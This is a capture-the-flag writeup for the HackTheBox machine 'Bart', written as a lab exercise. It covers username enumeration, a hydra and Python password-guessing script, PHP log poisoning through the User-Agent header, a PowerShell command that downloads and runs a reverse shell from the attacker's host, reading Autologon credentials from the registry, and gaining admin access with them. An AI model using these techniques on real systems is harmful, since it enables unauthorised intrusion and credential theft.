HackTheBox — Bart Writeup
Bart is a medium-difficulty but challenging Windows machine on HackTheBox. We use PHP log poisoning to gain initial access and then escalate privileges either through cached Autologon credentials or with Juicy Potato. The other tricky part of this box is password guessing and brute-forcing.
ENUMERATION
We find port 80 open, running IIS. There is also a domain, forum.bart.htb, which we add to /etc/hosts as shown below. We also add bart.htb, in case it hosts something different.
We open the domain in our browser and get this webpage
In the page source we find a user called Harvey Potter, who is listed as a developer (keep this name in mind; it is Harvey, not Harry).
If we run curl against the target IP we get a 200 response.
But if we append any gibberish directory to the IP we still get a 200 response, so the server does not answer missing paths with a 404 and a directory brute-forcer cannot rely on status codes alone to separate hits from misses.
Let's visit it in the browser.
Let's run dirb against the IP (or bart.htb); it finds a directory called /monitor.
Let's visit the directory. /monitor leads to the virtual host monitor.bart.htb, where we find this webpage.
DON'T forget to add the domain monitor.bart.htb to your /etc/hosts as well.
We click on Forgot Password and get this:
Since this Forgot Password form tells us whether a username exists or not, we can use it to enumerate valid usernames. When I try harvey, it works, so a user called harvey does exist.
We try Harvey's surname, Potter, as the password and it works. We are in!
Now we go to Servers and find a new domain, internal-01.bart.htb.
Let's add it to /etc/hosts.
Looks like another login panel.
I try harvey with Potter again, but it fails.
PASSWORD BRUTEFORCING USING HYDRA
I tried finding the password with hydra but was getting lots of false-positive passwords. The command that finally worked for me was this:
EXPLANATION OF THE COMMAND
SYNTAX: hydra -l username -P passwordlist <domain> <request-type> "/directory:post-body:failedMessage"
Note that the directory is the path from the URL of the login panel (/simple_chat/login.php), and the post-body field is the body of the login request as captured in Burp, with the username and password values replaced by hydra's ^USER^ and ^PASS^ placeholders. Finally, I used "Password" as the failure condition at the end of the command because the failure message contains that word (The password must be at least 8 characters long). The failure string must appear in every failed response: if some failed attempts return a page without it, hydra reports them as valid logins, which is where the false positives came from. In case of queries feel free to DM me.
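The username enumeration through the Forgot Password form and the failure-string password guessing above are the same classification problem: a request is a hit when a known marker is absent from the response. The following is an added example (not code from the writeup) that implements both with a pluggable transport; the paths /forgot and /simple_chat/login.php, the form field names, the marker strings and the FAKE_USERS data are assumptions, and the fake transport is a constructed stand-in so the block runs offline. It also shows the false-positive effect the text describes: a marker that is missing from one kind of failed response turns that failure into a reported "hit".

```python
"""Username enumeration and password guessing against a web login, added here as
an illustration (not code from the original writeup).  Paths, form field names,
the marker strings and the FAKE_USERS demo data are all assumptions."""
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, List, Optional

# A transport POSTs form fields to a path and returns the response body as text.
Transport = Callable[[str, Dict[str, str]], str]


def http_transport(base_url: str, timeout: float = 10.0) -> Transport:
    """Real transport built on urllib.  4xx/5xx bodies are returned as well,
    because the failure text we match on may live on an error page."""
    def post(path: str, fields: Dict[str, str]) -> str:
        data = urllib.parse.urlencode(fields).encode()
        req = urllib.request.Request(base_url + path, data=data, headers={
            "Content-Type": "application/x-www-form-urlencoded"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.read().decode(errors="replace")
        except urllib.error.HTTPError as err:
            return err.read().decode(errors="replace")
    return post


def enumerate_users(post: Transport, path: str, field: str,
                    candidates: Iterable[str], unknown_marker: str) -> List[str]:
    """Differential-response enumeration: a candidate is valid when the
    'no such user' marker is absent.  This only works because the application
    answers differently for known and unknown names."""
    return [u for u in candidates
            if unknown_marker.lower() not in post(path, {field: u}).lower()]


def guess_password(post: Transport, path: str, form: Dict[str, str], user: str,
                   wordlist: Iterable[str], fail_marker: str) -> Optional[str]:
    """Same logic as hydra's http-post-form with a failure condition: the first
    attempt whose response does NOT contain fail_marker is reported as a hit.
    If some failed responses lack the marker, the first of them becomes a
    false positive.  Matching is case-insensitive here; check your tool's rule."""
    for pw in wordlist:
        fields = {k: v.replace("^USER^", user).replace("^PASS^", pw)
                  for k, v in form.items()}
        if fail_marker.lower() not in post(path, fields).lower():
            return pw
    return None


# --- constructed offline stand-in for the two login panels -------------------
FAKE_USERS = {"harvey": "Winter2018"}   # invented demo data, not the box's real state


def fake_transport(path: str, fields: Dict[str, str]) -> str:
    """Mimics the behaviour the text relies on: the reset form leaks whether a
    user exists, and the chat login answers with two different failure texts."""
    if path == "/forgot":
        return ("Reset mail sent." if fields.get("user") in FAKE_USERS
                else "The username does not exist")
    if path == "/simple_chat/login.php":
        pw = fields.get("passwd", "")
        if len(pw) < 8:
            return "The password must be at least 8 characters long"
        if FAKE_USERS.get(fields.get("uname")) == pw:
            return "<title>Chat</title>"
        return "Invalid password"
    return "Page not found"


# Assumed POST body of the chat login, with hydra-style placeholders.
CHAT_FORM = {"uname": "^USER^", "passwd": "^PASS^", "submit": "Login"}

if __name__ == "__main__":
    users = enumerate_users(fake_transport, "/forgot", "user",
                            ["harry", "harvey", "admin"], "does not exist")
    words = ["potter", "Summer2018", "Winter2018"]
    print("valid users:", users)
    print("marker 'password':        ",
          guess_password(fake_transport, "/simple_chat/login.php", CHAT_FORM, "harvey", words, "password"))
    print("marker 'Invalid password':",
          guess_password(fake_transport, "/simple_chat/login.php", CHAT_FORM, "harvey", words, "Invalid password"))
```

Swap `fake_transport` for `http_transport("http://internal-01.bart.htb")` to run it against a real target. The second `guess_password` call in the usage block is the false-positive case: the short-password failure text does not contain "Invalid password", so the very first word in the list is reported as the password.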
We log in with the password and get this chat forum.
In the page source we find another URL; it seems to call a log file.
It looks like it logs the username and the User-Agent of the incoming request.
LOG POISONING
Visit the URL shown below
and intercept the request with Burp and send it to Repeater.
The User-Agent header is written into the log unsanitized, and the log is later interpreted as PHP, so it is our injection point.
In the User-Agent of the request, add this piece of PHP code and forward the request. We get a 200 OK response, as you can see on the right side. Great!
Now, on the first line next to the username parameter, add &cmd=whoami and forward the request again. We get a 200 OK, and on the right side you can see we are running as an NT AUTHORITY account, meaning our whoami command was executed.
To get a reverse shell, we simply replace the whoami command with a PowerShell reverse shell; I use Nishang's Invoke-PowerShellTcp.ps1 script for this. You can find it here: https://github.com/samratashok/nishang
Download Invoke-PowerShellTcp.ps1 and append the Invoke command shown below as its last line, replacing the IP and port with your Kali IP and listener port.
Now host this file with Python's HTTP server, and don't forget to start a netcat listener on port 5555.
This will be the final command:
powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.2:9999/Invoke-PowerShellTcp.ps1')
After URL encoding, this is what the command looks like (see the second line):
Copy the URL-encoded command and paste it after &cmd= in the Burp request.
Forward the request. This executes the PowerShell reverse shell and gives us a shell on our netcat listener.
PRIVILEGE ESCALATION
To escalate privileges we can either use the Autologon credentials or the Juicy Potato attack.
JUICY POTATO
Using the systeminfo command we see that the build is 15063.
We also find that SeImpersonatePrivilege is enabled. Build 15063 predates the 1809 changes that broke Juicy Potato, so with that privilege the attack applies here.
I have already covered it many times in my older CTF writeups. If you wish to try it, refer to Rana Khalil's writeup: https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/more-challenging-than-oscp/bart-writeup-w-o-metasploit
AUTOLOGON CREDENTIALS
I ran winPEAS on the target and found the Administrator's password in the Winlogon autologon values. Here I will cover two ways to use it: PSSession and net use.
The same information can be found with this manual command:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
The DefaultPassword value is readable by any local user. Autologon configured with the Sysinternals Autologon tool instead stores the password as an LSA secret, which an unprivileged user cannot read, so finding a cleartext DefaultPassword is worth flagging in the report.
+PSSESSION
We can become Administrator by spawning a PSSession with the newly found credentials:
$pw = ConvertTo-SecureString -string "3130438f31186fbaf962f407711faddb" -AsPlainText -force;
$pp = new-object -typename System.Management.Automation.PSCredential -ArgumentList "BART\Administrator", $pw;
Enter-PSSession -ComputerName localhost -Credential $pp
Once the session is established we run commands inside it as usual. Because a reverse shell is not a real interactive console, Enter-PSSession may hang or show no prompt; the reliable fallback is to run each command through Invoke-Command with the same credential:
Invoke-Command -ComputerName localhost -Credential $pp -ScriptBlock { command }
DO NOTE CAREFULLY: this is where I found the user flag. It sits under the h.potter profile, not under a "harvey" folder.
The root flag is located in the Desktop folder of Administrator
NOTE: The same method is also covered in Rana Khalil's HTB Chatterbox writeup: https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/windows-boxes/chatterbox-writeup-w-o-metasploit#e858 (also refer to that)
+NET USE
PS HKLM:\software\microsoft\windows nt\currentversion\winlogon> net use x: \\localhost\c$ /user:administrator 3130438f31186fbaf962f407711faddb
The command completed successfully.
PS HKLM:\software\microsoft\windows nt\currentversion\winlogon> x:
PS X:\> cd users\administrator\desktop
PS X:\users\administrator\desktop> ls
Directory: X:\users\administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/02/2018 12:51 32 root.txt
With an admin shell we can grab both flags:
PS C:\Users\Administrator\Documents> cat C:\users\h.potter\desktop\user.txt
625b6c7a...
PS C:\Users\Administrator\Documents> cat C:\users\Administrator\Desktop\root.txt
0074a38e...
It can also be done using runas; refer to 0xdf's writeup for that.
I hope you liked my writeup and learned a lot from it. For more such writeups, follow me here on Medium. - Zeus